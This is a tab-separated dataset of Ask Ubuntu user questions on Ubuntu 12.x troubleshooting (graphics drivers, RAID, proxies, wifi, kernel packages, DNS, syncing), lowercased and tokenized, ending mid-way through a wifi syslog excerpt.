253154	how should i properly set up my ccsm , xorg.conf and nvidia-settings for fullscreen games ?	good afternoon , i am a new ubuntu user and i need some help to duly set up my gpu card . i am really lost with this , i have read a lot about how to configure nvidia cards , but i can not possibly solve a matter related to compiz , nvidia , the benchmark tool glxgears ( well , most of linux users claim it is not a real benckmark tool ) and games performance on fullscreen . so i just hope someone could please help me to set it up . here , how some files are configured ( only resumed ) : xorg.conf : section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400m gs '' option `` nologo '' `` true '' option `` noflip '' `` false '' option `` renderaccel '' `` true '' option `` addargblxvisuals '' `` true '' option `` allowglxwithcomposite '' `` true '' option `` dynamictwinview '' `` false '' option `` triplebuffer '' `` true '' option `` twinview '' `` false '' option `` flatpanelproperties '' `` scaling = native '' option `` registrydwords '' `` perflevelsrc=0x2222 ; powermizerenable=0x1 ; powermizerlevel=0x3 ; powermizerlevelac=0x1 '' endsection section `` extensions '' option `` composite '' `` enable '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection nvidia-sttings : # attributes : as5720g:0.0/synctovblank=1 as5720g:0.0/loganiso=0 as5720g:0.0/fsaa=0 as5720g:0.0/texturesharpen=0 as5720g:0.0/textureclamping=0 as5720g:0.0/allowflipping=1 as5720g:0.0/fsaaappcontrolled=1 as5720g:0.0/loganisoappcontrolled=1 as5720g:0.0/openglimagesettings=3 as5720g:0.0/fsaaappenhanced=0 as5720g:0.0/digitalvibrance [ dfp-0 ] =0 as5720g:0.0/gpuscaling [ dfp-0 ] =65538 as5720g:0.0/colorspace [ dfp-0 ] =0 as5720g:0.0/colorrange [ dfp-0 ] =0 as5720g:0.0/xvideotexturebrightness=0 as5720g:0.0/xvideotexturecontrast=0 as5720g:0.0/xvideotexturehue=0 as5720g:0.0/xvideotexturesaturation=0 as5720g:0.0/xvideotexturesynctovblank=1 as5720g:0.0/xvideosynctodisplay=65536 compizconfg - unity profile : [ composite ] s0_slow_animations_key = disabled s0_detect_refresh_rate = true s0_refresh_rate = 60 s0_unredirect_fullscreen_windows = true s0_unredirect_match = ( any ) & ! ( class=totem ) & ! ( class=mplayer ) & ! ( class=vlc ) & > ! ( class=plugin-container ) & ! ( class=firefox ) s0_force_independent_output_painting = false [ opengl ] s0_texture_filter = 1 s0_lighting = false s0_sync_to_vblank = true s0_texture_compression = false s0_unredirect_driver_blacklist = ( nouveau|intel ) . *mesa ( 8.0|9.0 ) here , some system details : os : ubuntu 12.04.1 lts , unity 3d kernel : 3.2.0.37 cpu : intel core2duo t7100 gpu : nvidia geforce 8400m gs and here , the glxgears issue : 1 ) - with all above changes currently set , glxgears is limited to refresh rate ( about 60 frames per second ) both windowed and fullscreen modes , but gears move kind of like laggy and sluggish . 2 ) - if 'sync to vblank ' is disabled in ccsm , glxgears is limited to refresh rate both windowed and fullscreen mode . gears are smooth and flawless , but there is a bit of tearing on fullscreen , just in the middle . 3 ) - if 'sync to vblank ' is disabled in opengl nvidia-settings , glxgears is not limited to refresh rate neither windowed nor fullscreen ( between 180 - 200 fps ) . gears move perfectly smooth , flawless and without tearing when they are windowed , but they are laggy and sluggish on fullscreen ( i guess due to the composite . the refresh rate is 200 fps or 1000 frames per 5 seconds ) . 4 ) - if 'sync to vblank ' is disabled in both ccsm and opengl nvidia-settings , glxgears is not limited to refresh rate ( between 2050 - 180 fps ) . gears move smooth but with tearing . most of nvidia & ubuntu users suggest turning on both 'sync to vblank ' and overlook the glxgears performance , but i do not know if i should do it or not . lastly , regarding fullscreen games , i checked 'sync to vblank ' from ccsm does not affect their performance , but opengl 'sync to vblank ' form nvidia-settings does . games have some tearing issues and they are not smooth at all , even though frames are limited to 60fps . i am really looking forward to getting rid of that tearing . thanks in advance .
253159	restoring raid after linux installation	after years using windows and wishing to enter the linux world , i recently installed ubuntu 12.04 . i have a dell vostro 3460 with : 500 gb hdd 32 gb ssd msata ( cache - not physical drive ) my former os was windows 7 . when i changed it to linux ubuntu , during the installation , i encountered problems concerning my drives . apparently because i had raid between the drives linux installation did n't know how to handle this so according to this post i had to delete the raid . this puts me in a very sad situation because i have an ssd drive without the ability to use it ( although linux recognizes it as a separate drive during the installation and lets me install linux on it , because its not a physical drive - i ca n't set it as a bootable hard drive ) . so now i have a linux os on my 500gb hard drive and an unusable ssd drive . is it possible to `` re-raid '' the drives or any other way to make the ssd usable again and still use ubuntu ? because im a noobie in linux ( in general and ubuntu in particular ) a detailed answer will be much appreciated : ) thank you very much
253161	how to use intel integrated graphic card for display and nvidia card for cuda on a desktop	on my desktop , i have a gtx560ti which i use for cuda and display i have installed the installed the nvidia driver and everything works fine i have an intel hd graphics 3000 integrated in my cpu . i want to use this graphic card for my display , instead of my nvidia card . how to proceed ? how to install intel driver vithout breaking cuda ? my ubuntu is 12.04
253163	download 12.10 gives 12.04.01 lts	i 'm a newbie just experimenting . when i download 12.10 by clicking on the get ubuntu 12.10 button i actually get 12.04.1 lts . installed it works fine on a ancient dell inspirion 8000 that i had retired ... but i would have liked to get the latest and greatest just to poke around and see what 's it about .
253168	understanding proxy settings in ubuntu	i 'm behind a university proxy and i 'm very confused about ubuntu 's proxy settings and i 'd love if someone can clarify it for me . if i look inside /etc/apt/apt.conf it has my custom set proxy as acquire : :http { proxy `` http : //user : pass @ proxy : port '' ; } ; acquire : :http : :proxy `` http : //user : pass @ proxy : port/ '' ; acquire : :https : :proxy `` https : //user : pass @ proxy : port/ '' ; acquire : :ftp : :proxy `` ftp : //user : pass @ proxy : port/ '' ; acquire : :socks : :proxy `` socks : //user : pass @ proxy : port/ '' ; inside /etc/environment i have http_proxy= '' http : //proxy : port/ '' https_proxy= '' https : //proxy : port/ '' ftp_proxy= '' ftp : //proxy : port/ '' socks_proxy= '' socks : //proxy : port/ '' but if i do this echo $ http_proxy then i get http : //differentproxy : differentport i do n't get it from where it 's 'echo'ing . any clarification ? i know i can export the $ http_proxy variable to the correct proxy but i just want to understand what all files/settings ubuntu uses for proxies .
253175	do i have the full os installed ?	i installed ubuntu using wubi.exe last night which is running alongside my windows 8 . when i boot up my laptop , i get given a choice between windows or ubuntu . am i running the full ubuntu os ? every time i start my laptop into ubuntu , my brightness is always on the lowest even though i set it to the brightest . my short-cut buttons on my laptop no longer work . for example , i use a 24 '' monitor to watch movies etc on , so using fn+f4 switches between displays easily . and using fn+f2/3 decreases and increases my brightness . so far i love ubuntu , but i 'm very new at it . i do see myself replacing windows 8 with ubuntu in the near future . thanks for your time .
253177	open documents , ppt and excel sheets directly into google docs/driver	i do not want to use libreoffice and not able to find lightweight alternative for excel and ppt viewers . so could you please tell me how can trick nautilus to open these files directly into google docs/drive using my default browser . nautilus-gdoc seems to add this functionality , but it can not open it seemlessly . i.e . double clicking does not take me to browser and open the document .
253178	how to fix all kind of harddisk errors ?	how can i fix all kind of harddisk errors ? because i have a ubuntu pc and i want to install one more separate flavour of ubuntu for testing purpose but its keeping giving me an error like file system having errors . in the live mode i have tried like sudo fsck -y /dev/sda9 i mean my drive letter and in the later try , again the same error came up & i am tired with many number of trails . edit :
253183	user account needs password to eject kindle in calibre	my 12.10 computer has several accounts on it . my wife has a kindle keyboard 3g that she manages with calibre . the problem is that every time she tries to eject the device in calibre if asks for my password . mine is the main administrative account which may be why it wants my password . i 'm not at the computer so am not positive whether i could eject from the file manager without a password , though i know that other usb flash drives do n't require it .
253185	ubuntu 12.04 system crashes right after login - boot-repair log included	wow , my system crashes hard - right after login ! i 've heard about quite some crashed with ubuntu 12.04 . ... any suggestions on how to proceed ? here is the link to the logfile of boot-repair - which i tried without success ( details see below ) : http : //paste.ubuntu.com/1630291/ also , running memtest86 from the boot-up program resulted in 0 errors found . neither , did a check on the harddrives yield an error message . further details ubuntu will boot fine up to the login screen . then - after i enter the password and hit login - it will hang . i am not able to enter anything at the resulting screen ( see image - larger view here ) . the first time this occurred was right after i cleaned my computer carefully with aerosol . maybe a hardware damage ? but i do n't think so , it was minimal maintenance mostly focusing on the cooling-fans . also , i removed an old harddisk ( no boot partition , just mp3 data ) . regarding boot-repair ... ran it through ubuntusecureremix ( a ubuntu boot mix cd ) a and used the standard option `` recommendend repair - repairs most frequent problems '' .
253189	can i make the webcam take a picture when an incorrect password is entered ?	i am using a laptop . i was thinking to have a support in my ubuntu machine . when an incorrect password is entered , a picture is taken later revealing who has been trying to gain access . i have searched around and the only thing i have found is stuff to do this on macs . is it possible to write a script for ubuntu to do same . if possible then what is a script or software to make this happen .
253190	laptop with nvidia gt555m and optimus	i have a laptop with nvidia gt555m graphics card + optimus . i was wondering how i can make it so that i can play games on ubuntu . i now have windows on my laptop and the only thing keeping me there are some games that i like to play , so if i could install drivers for ubuntu i would gladly make the switch .
253191	searching techniques via nautilus or otherwise	lets say i have following files in a folder blue-green-red red-yellow-blue green-black-red now i want to search files having 'green ' and 'red ' as part of their names ( case insensitive ) , how i do that via nautilus or any gui ? back in windows it was easy via total commander ... especially if you are dealing with media files & want to 'queue play ' only files meeting above criteria thus terminal options are of no use !
253192	why isnt ibus functional ( in xfce ) ?	i 'm trying to use ibus to type in japanese . i have set up the anthy ime properly , and the `` enable or disable '' setting to function when pressing ctrl+space . in any case , it 's simply not working . i enter the keyboard combination , and the input method just does n't switch on . specifically clicking on `` japanese - anthy '' does n't do anything either ; it stays on `` input method off '' . i 'm using xfce on xubuntu 12.10 installed ibus-related packages : gir1.2-ibus-1.0 ibus ibus-anthy ibus-clutter : i386 ibus-gtk : i386 ibus-gtk3 : i386 ibus-mozc ibus-qt4 ibus-table ibus-xkbc libibus-1.0-0 : i386 libibus-qt1 libusb-0.1-4 : i386 libusb-1.0-0 : i386 libusbmuxd2 python-ibus
253193	simple and easy way to sync folders over lan	summary : i 'm using ubuntu 12.04 on my laptop and on my desktop . i need to sync my data between these computers . i do n't want a backup utility - i need a two-way sync . what i tried already : using a cloud ( dropbox , ubuntu one ) is not an option because there 's too much data to sync ( ~50 gb , 12000 files ) - even if i purchased extra space , sending all this over the internet would take forever . this task is really easy on windows - i can just use freefilesync and a shared network folder . that 's the user-friendliness i want . unfortunately , freefilesync does n't work well with my ubuntu , and apparently it can not recognize a samba share address ( it 's the only way of sharing folders that i know how to setup ) . dirsync pro looks promising , but it throws an error when i try to run it : exception in thread `` main '' java.lang.unsupportedclassversionerror : dirsyncpro/dirsyncpro : unsupported major.minor version 51.0 maybe it 's because i have wrong java , but unfortunately dirsync does n't say what precisely i need . ( i tried installing java runtime environment from here , but it did n't work ) . i do n't want a command line tool , because i need an interactive way to view and set which files should be synced and in which direction . i 've already looked at this question . from what i see , nothing there suits my needs . maybe i 've overlooked something , but i 've already spent a few frustrating hours trying to find a solution , configuring dependencies etc . without success . a simple , foolproof solution please ?
253194	how can i get around that blank screen ?	this is my first experience with any linux product . i successfully installed ubuntu 12.10 i386 version . but now i only get a blank screen . my computer specs are pentium 4 ( 1.8 ghz ) 1.25gb-ram and no graphic card .
253198	dropbox synchronizing every time i press a key in kate	i 've just noticed dropbox will synchronize a file every time i press a key in kate ( the text editor ) . this behavior does not cause problems but it is annoying to say the least . is this caused by dropbox or by some behavior in kate ? and how can i turn it off ?
253201	how to boot windows installation from iso image through iscsi from grub ?	i have a computer and a server . both with ubuntu 12.04 : desktop and server respectively . on the server configured iscsi target with 2 luns . first for windows os and second is emulated iso image with win8 installation dvd . so from grub boot loader in my desktop i 'm trying to boot iso image at the server with win8 installation trough iscsi . and install w8 os as second os . i found the way to boot windows from iscsi by using pxe network boot . and i found the way how to boot linux from iscsi . and how to boot w8 from grub . but how to combine thees ? that will be great to have usb flash drive with pre-configured grub to install iso 's remotely from iscsi target . so how to boot windows installation from iso image through iscsi from grub ?
253202	how to get around `` failed to set mode on [ crtc:6 ] '' errors during installation ?	i 've tried to install ubuntu 12.04 on my pc with wubi from windows . after rebooting the system , and after selecting ubuntu as os , there 's an error : try ( hd0,0 ) : ntfs5 : errors : `` prefix '' is not set . i 've read that it 's normal after using wubi . then i see a screen that say 's : installation will be complete in 5 seconds . press esc for more options ( sth like this ! ) when it keeps on installing , in copying file step , my pc hanged up ! i restarted the pc & those errors appeared again , so i pressed esc . then one of the options was : safe ( none graphical ) ( sth like this ! ) i selected it and during installation i faced this error for to many times : [ drm : drm_crtc_helper_set_config ] *error* failed to set mode on [ crtc:6 ] although the installation keeps on installing ! ! ! at last in the copying file step , after 65 % done i saw some errors again that have loop ( 0 ) and more things like that ! ! !
253205	how do i switch between kwin window tabs ?	how do you switch tabs when you attach a window as the tab of another ? i was n't able to find the corresponding kwin shortcuts to modify . i have realized that scrolling over the titlebar works , but is there a key binding i could use ? a custom shortcut , probably ? what is the command i would have to execute to switch between tabs ?
253208	can i install ubuntu on a laptop ?	i have a completely blank , new out the box , hard drive . can i still use ubuntu 12.10 on my laptop ?
253209	use luks and lvm on install to external drive	so i have a laptop running backtrack 5 r3 using luks and lvm , manually configured , and i 'm trying to install ubuntu 12.10 to a usb 3 external drive and use luks and lvm on that as well , but i ca n't seem to get the automated installer to default to my external drive instead of trying to overwrite my bt5 installation , and while it gives me the option to install alongside it , i 'd prefer to just install to the external drive for portability without having to do the fancy luks and lvm manual config i had to do with the internal bt installation , plus i do n't know if the installer would realize it 's an unlocked luks container and not try to unmount it if i tried to do automated side-by-side installation on the internal drive . do i have to just remove the internal disk so it wo n't recognize it during installation ? thanks , dom
253215	how to find out the name of the packages involved in the proprietary driver ?	i have installed ubuntu 10.04 on my hp mini 110-3110br for test purposes . a notification about a proprietary driver popped up . it 's for the broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) . after i activated it , it worked perfectly . but i also want to reinstall debian on this machine . i had it before , and wireless worked perfectly , but i remember i had a very hard time to make it work . so , i want to know how to extract more information from the proprietary driver on ubuntu , to make it work on debian . i think that the name of the packages involved would be enough . i want to make it work from the installation . i do n't want to install it with ethernet , like i did before . thanks in advance .
253217	installing ubuntu on a windows 8 uefi laptop ?	i have created an usb installer with unetbootin for ubuntu 12.10 live ( i 'm not sure if that is the right one for this ) i disabled fast boot , but i did n't change uefi to legacy because nothing will boot at all when i do that . when i boot to my usb , i get a prompt : grub > i really do n't know what to do from here , or if i even did anything right up to that point . if anyone can help me with this , i would be very grateful . thank you in advance .
253225	slapd with back_sock does not create a socket	i have installed slapd on ubuntu 12.04 and configured it with the following under /etc/ldap/slapd.conf : modulepath /usr/lib/ldap moduleload back_sock.la database sock socketpath /tmp/slapd.sock however , if i start slapd with service slapd restart then , slapd is running but there is no socket file in /tmp . what am i missing ? update : output of netstat -nlp | grep slapd is : tcp 0 0 0.0.0.0:389 0.0.0.0 : * listen 860/slapd tcp6 0 0 : ::389 : : : * listen 860/slapd unix 2 [ acc ] stream listening 8303 860/slapd /var/run/slapd/ldapi
253229	how do i call freemat that was installed via alien ?	how do i call freemat that was installed via alien ? i 'm running 12.10 32 bit . i have tried freemat , freemat4.1.1 and freemat4 and none have worked .
253230	i can not install ubuntu 12.10	i have burned the iso image onto a disc , restarted my computer booting from the disc , gone through the `` install ubuntu '' option to run inside windows 8 . and a while later it tells me to remove the installation media , close the try and press enter . then it reboots my laptop , then takes me into windows 8 . ubuntu literally did nothing ! i 'm confused . and i 'm stressed out . i 've been at this for the pass 5 hours , five hours ! i have a usb available if it 's easier to install like that .
253231	how do i enable a caldav server ( in an owncloud installation ) to send email reminders for events ?	i have a lubuntu 12.10 server set up in vmware virtualbox with an owncloud 4.5.6 installation . one of owncloud 's functions is as a caldav server . owncloud 's web front-end does n't yet have an interface for adding or editing event reminders . however , it does record settings for event reminders made by other clients -- evolution , for example , can see reminder settings recorded in events that i imported into owncloud from a google calendar . however , email reminders for events in owncloud , even though the reminder settings are saved with the events , are not being served -- the caldav server has n't sent me any reminders for these events . i 'm wondering whether there is a way to set up the caldav server so that it will send email reminders that are included in events ' settings . i 've read elsewhere that caldav can do this , and that it 's just that owncloud does n't provide a gui for it yet . is that correct ? what would i need to do to set that up ? thank you ! i 'll be grateful for any guidance you can offer to me ! a note : this question is bit similar to the question at is there a caldav client with email alert support on ubuntu server ? , which is old and was never answered .
253233	after my ubuntu installation finished , a reboot shows only an unwritable command line	i struggled to install ubuntu on my laptop after a disaster happened when i was using windows 8 . all the partitions were wrong and i had to search the forums for the correct ones . the last ones i tried ( with a live usb install ) after a lot of failed installations were : /dev/sda5 swap 2gig ( logical ) /dev/sda6 ext3 7gig ( logical ) /dev/sda7 ext7 310gig ( logical ) it finished the installation successfully , but whenever i boot up the machine the only thing that appears is a blank command line that i ca n't write on no matter what i do . i re-loaded the live usb and it does detect the os . i do n't want to re-install it again without knowing what to do . ( i am installing ubuntu 12.04 )
253237	xubuntu 12.10 ; battery drains when laptop lid is closed	i am on xubuntu 12.10 . when i close my laptop lid , the screen goes black as normal , and the normal login window appears when i open it up again . however , i notice that for example , i left my laptop closed for no more than about 45 mintues , yet my battery had drained more than 30 % . the same thing happened to me the previous night , where i left my laptop lid closed the whole night at around 50 , 60 % , yet dead by morning . i use xscreensaver . are there any settings i need to change ? i have no background processes running as far as i know .
253239	add server between current wireless router and new router	i have a ubuntu 12.04 server with a wireless router attached . i would like to connect it to my modem/wireless router via the wireless interface in a transparent manner . my goal is to use the server to log some netflows and maybe run squid between the modem and wireless . would this be done via a network bridge ? i 'm not sure how to handle dhcp . would it be possible to use dhcp from the wireless router to issue ips from the access point ? or would disabling dhcp on the modem/wireless router , assigning the server a static ip and turning on dhcp on the attached router . any thought on how to do this would be appreciated . internet < - > modem/wireless router < - > server < - > wireless router < - > devices
253243	apt wedged by kernel version mismatch	apt is seemingly unable to do anything useful for me , repeatedly giving messages of this form : dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.37.44 ) ; however : version of linux-image-server on system is 3.2.0.37.45. linux-server depends on linux-headers-server ( = 3.2.0.37.44 ) ; however : version of linux-headers-server on system is 3.2.0.37.45. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured this is basically the same problem as i can not install any package ( linux-image-server , linux-server dependencies errors ) which got closed duplicate to an answer that is totally useless for this situation . none of the advice in that very generic answer about dependencies helps . explicitly : sudo apt-get clean sudo apt-get autoclean sudo apt-get update all have no not effect . while sudo apt-get -f install sudo dpkg -- configure -a sudo apt-get -u dist-upgrade sudo apt-get -o debug : :pkgproblemresolver=yes dist-upgrade all give some form of the error message above .
253244	reinstall latest kernel ?	i did something silly with a build/modprobe/make while running on my latest installed kernel . now that kernel will not boot . i am currently running on a previous kernel . how can i clean this up ? i would like to just get back to the `` stock '' latest kernel that is in the apt repo . edit : i should note ... . i was trying to install flashcache ( https : //github.com/facebook/flashcache/ ) i tried to do sudo apt-get install -- reinstall linux-image-generic linux-image that did n't fix it ; so i tried the `` recovery mode '' option and see a kernel panic around the loading of the flashcache module ... . i must need to delete something , somewhere ...
253245	bluetooth mouse cant connect after reboot	i have microsoft sculpt bt mouse , i could set up my mouse , and it worked , but after reboot , it 's not working anymore i clicked connect under the bluetooth menu with my touchpad , but it cant connect . i looked this link but my config already like that .
253251	will running cinnamon on 12.04 slow down ubuntu ?	i really like the cinnamon interface ( already know how to get cinnamon on ubuntu ) just need to know if it will slow down my computer . i use unity on 12.04 ubuntu as requested here are my computer specs : i5 2500k 8gb of ram nvidia 7800 gtx
253254	how do i fix this unity rendering issue ( vmware guest ) ?	i have just download the ubuntu desktop and show me this : i use the windows 7 .
253257	ubuntu does n't reconnect to wifi unless i reboot	i am dual-booting my laptop going between windows 7 and ubuntu 12.04 lts . initially , i can connect to wifi , but if i get disconnected for some reason , or if i restart my router , ubuntu wo n't reconnect unless i reboot my laptop . just logging out and back in wo n't work , i have to restart ubuntu , why and how can i fix this ? the output of sudo lshw -c network is *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth1 version : 01 serial : e4 : d5:3d:77 : df:9d width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) ip=192.168.1.105 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:16 memory : c2500000-c2503fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 05 serial : ec:9a:74:48 : ce:63 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 ioport:3000 ( size=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff i have installed broadcom sta wireless driver . i have experienced the same issue before with other distros ; crunchbang does n't connect to wireless at all , archbang wo n't connect to wireless after upgrading pacman . the problem began with ubuntu , which is why i tried both crunchbang and arch and then ended back at ubuntu . the output of : lsmod cat /etc/modules cat /etc/modprobe.d/blacklist.conf
253258	how do i install utorrent after i encounter the problems in the description ?	how do i install utorrent ? i have downloaded the tarball from here , extracted it to /home/brentonhorne/utorrent-server-v3_0 and run : cd /home/brentonhorne/utorrent-server-v3_0 ./utserver which takes me to : brentonhorne @ brentonhorne-vostro-3500 : ~ $ cd '/home/brentonhorne/utorrent-server-v3_0 ' brentonhorne @ brentonhorne-vostro-3500 : ~/utorrent-server-v3_0 $ ./utserver server started - using locale en_au.utf-8 using locale en_au.utf-8 file not found during integrity check : /home/brentonhorne/utorrent-server-v3_0/settings.dat file not found during integrity check : /home/brentonhorne/utorrent-server-v3_0/settings.dat.new file not found during integrity check : /home/brentonhorne/utorrent-server-v3_0/settings.dat.old file not found during integrity check : .//settings.dat file not found during integrity check : .//settings.dat.new file not found during integrity check : .//settings.dat.old total physical memory -1 max disk cache 33554432 file not found during integrity check : .//dht.dat file not found during integrity check : .//dht.dat.new file not found during integrity check : .//dht.dat.old file not found during integrity check : .//rss.dat file not found during integrity check : .//rss.dat.new file not found during integrity check : .//rss.dat.old file not found during integrity check : .//resume.dat ipv6 is installed file not found during integrity check : .//resume.dat.new file not found during integrity check : .//resume.dat.old at which point i get stuck and it stays at this step way for days . i am running 12.10 . after i ran utserver -settingspath /opt/utorrent-server-v3_0/ i received the output : server started - using locale en_au.utf-8 using locale en_au.utf-8 total physical memory -1 max disk cache 33554432 loaded ipfilter.dat ( 0 entries ) ipv6 is installed at which point it froze just as it did with the commands listed earlier .
253259	keyboard shortcut to `` output volume '' in sound control	i sometimes want to increase the output volume on my laptop beyond 100 % . in order to do so i need to open `` sound '' in `` system settings '' . i would like to set a keyboard shortcut to do that . i found out that i can set a custum shortcut in system settings > keyboard > shortcuts with the command `` gnome-control-center sound '' , which will bring up `` sound '' . so far that works well , but there is a little optimization that i would like but can not figure out . the problem is this : when i use the shortcut to open `` sound '' , the focus is not on `` output volume '' . so before i can modify the output volume with the arrow keys , i need to either click on output volume or hit the tab key five times , thus moving the focus to output volume . my question is this : is there something that i can add to the command `` gnome-control-center sound '' so that the focus is moved to `` output volume '' automatically , for example something equivalent to `` hit tab key five times '' ? thanks in advance for your help ! wolfhart
253260	ubuntu 12 boot problem	i have runned an ubuntu update from 11 to 12.4 and when the computer restarted the ubuntu logo showed quickley , then the black screen with the mouse icon active with the wait circle rotating continiously . i try to boot from the old ubuntu 11.00 cd and the same thing happens . any keyboard combination for a safe boot or any suggestions please ?
253266	how to diagnose a selective dns resolution failure ?	i just obtained an asus rt-n66u router , which i 've flashed with the tomato firmware . the router is for the most part working fine , but i 'm having trouble connecting to facebook in a consistent way . there 's a macbook air on the network that always seems to be able to connect , but my ubuntu laptop can only connect through a vpn . this seems to me a dns problem , but a weird one , as it does n't affect all machines on the network , or all sites , for that matter . i 've tried things like changing the dns server addresses on the router ( to google 's and opendns 's ) and also tried to turn off ubuntu 's local dnsmasq by commenting out dns=dnsmasq in /etc/networkmanager/networkmanager.conf , but without success . i 'm not sure what can i try next as i 've never had a dns issue where only one site seems to fail ( although twitter seems to be awfully slow without the vpn as well ) . any ideas ?
253271	how to permanently , unfixably disable wireless internet ?	i have a problem with internet addiction . ( yes , really . ) i have internet access on my cellphone , which i do n't abuse , but having internet on my laptop basically makes me completely non-productive . in the past i fixed this by going into /sbin and doing rm iw* if* , which makes it impossible to get internet back because to get those files back needs a livecd and to get a livecd requires internet ; i gave a livecd copy to a responsible friend in case of emergency . however , i recently got a new laptop and upgraded to 12.10 . i 'm having trouble completely disabling the wireless . i tried removing nt-* but this had no effect - the applet is gone , but the laptop still automatically connects . i tried removing iw* if* and /usr/sbin/networkmanager , but after doing that and rebooting , xorg mysteriously just blackscreened , so i had to use a livecd to copy the files back . x now works , but i still have internet access . all help appreciated : )
253274	wifi connection stopped working after upgrade	my wifi connection has been working flawlessly for 2 years running ubuntu 11.04 at first and even after upgrading to 12.04 . a few minutes ago , the connection to my router suddenly stopped dropped ; this was after a restart ( it had been connected right up until then ) . the network icon on top indicates that it is trying to connect and after a while it stops and tells me i that i am disconnected . all 3 of the other devices that are connected to the router maintain access as usual so i do not think it has anything to do with the router itself . also , i found out that i have no problem connecting to the hotspot of my cell phone - even though my computer ca n't connect to my router . i have also reinstalled ubuntu onto my laptop ; during the installation , the wifi is present as wlan0 but after the upgrade it 's changed to eth1 . any ideas on what the problem may be or tips on how to debug it ? thank you for your time and help . lspci : 24:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) syslog : feb 9 23:58:14 probook networkmanager [ 963 ] : < info > activation ( eth1 ) starting connection 'wireless' feb 9 23:58:14 probook networkmanager [ 963 ] : < info > ( eth1 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] feb 9 23:58:14 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... feb 9 23:58:14 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... feb 9 23:58:14 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... feb 9 23:58:14 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . feb 9 23:58:14 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... feb 9 23:58:14 probook networkmanager [ 963 ] : < info > ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] feb 9 23:58:14 probook networkmanager [ 963 ] : < info > activation ( eth1/wireless ) : access point 'wireless ' has security , but secrets are required . feb 9 23:58:14 probook networkmanager [ 963 ] : < info > ( eth1 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] feb 9 23:58:14 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) complete . feb 9 23:58:24 probook networkmanager [ 963 ] : get_secret_flags : assertion `is_secret_prop ( setting , secret_name , error ) ' failed feb 9 23:58:24 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... feb 9 23:58:24 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... feb 9 23:58:24 probook networkmanager [ 963 ] : < info > ( eth1 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] feb 9 23:58:24 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... feb 9 23:58:24 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . feb 9 23:58:24 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... feb 9 23:58:24 probook networkmanager [ 963 ] : < info > ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] feb 9 23:58:24 probook networkmanager [ 963 ] : < info > activation ( eth1/wireless ) : connection 'wireless ' has security , and secrets exist . no new secrets needed . feb 9 23:58:24 probook networkmanager [ 963 ] : < info > config : added 'ssid ' value 'wireless' feb 9 23:58:24 probook networkmanager [ 963 ] : < info > config : added 'scan_ssid ' value '1' feb 9 23:58:24 probook networkmanager [ 963 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' feb 9 23:58:24 probook networkmanager [ 963 ] : < info > config : added 'auth_alg ' value 'open' feb 9 23:58:24 probook networkmanager [ 963 ] : < info > config : added 'psk ' value ' < omitted > ' feb 9 23:58:24 probook networkmanager [ 963 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) complete . feb 9 23:58:24 probook networkmanager [ 963 ] : < info > config : set interface ap_scan to 1 feb 9 23:58:24 probook networkmanager [ 963 ] : < info > ( eth1 ) : supplicant interface state : disconnected - > scanning feb 9 23:58:26 probook wpa_supplicant [ 1159 ] : trying to associate with 00:14 : bf : dc:74:26 ( ssid='wireless ' freq=2462 mhz ) feb 9 23:58:26 probook networkmanager [ 963 ] : < info > ( eth1 ) : supplicant interface state : scanning - > associating feb 9 23:58:26 probook wpa_supplicant [ 1159 ] : associated with 00:14 : bf : dc:74:26 feb 9 23:58:26 probook networkmanager [ 963 ] : < info > ( eth1 ) : supplicant interface state : associating - > 4-way handshake feb 9 23:58:26 probook wpa_supplicant [ 1159 ] : wpa : key 